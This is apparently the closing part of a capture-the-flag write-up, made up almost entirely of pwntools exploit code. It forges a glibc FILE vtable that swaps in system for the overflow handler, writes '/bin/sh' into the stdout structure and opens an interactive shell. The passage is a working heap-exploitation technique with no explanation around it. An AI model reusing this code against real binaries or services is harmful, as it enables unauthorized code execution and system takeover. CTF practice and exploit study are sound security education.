print("wait for it...")

malloc(7, 0x368, p64(0xfbad2887) + stdout_FILE + p32(2) + p32(0) )

gi_jump = (p64(0)*2 +
p64(libc.sym._IO_new_file_finish)+
p64(libc.sym.system)+#p64(libc.sym._IO_new_file_overflow)+
p64(libc.sym._IO_new_file_underflow)+
p64(libc.sym.__GI__IO_default_uflow)+
p64(libc.sym.__GI__IO_default_pbackfail)+
p64(libc.sym._IO_new_file_xsputn)+
p64(libc.sym.__GI__IO_file_xsgetn)+
p64(libc.sym._IO_new_file_seekoff)+
p64(libc.sym._IO_default_seekpos)+
p64(libc.sym._IO_new_file_setbuf)+
p64(libc.sym._IO_new_file_sync)+
p64(libc.sym.__GI__IO_file_doallocate)+
p64(libc.sym.__GI__IO_file_read)+
p64(libc.sym._IO_new_file_write)+
p64(libc.sym.__GI__IO_file_seek)+

p64(libc.sym.__GI__IO_file_close)+
p64(libc.sym.__GI__IO_file_stat)+
p64(libc.sym._IO_default_showmanyc)+
p64(libc.sym._IO_default_imbue))
malloc_no_out(8, 0x378, gi_jump)

edit_no_out(7, b"/bin/sh\0" + stdout_FILE+p32(0xffffffff))
print("ready")
p.sendline("5")
p.interactive()
```

Original writeup (https://api.ctflib.junron.dev/share/writeup/wide-open-59).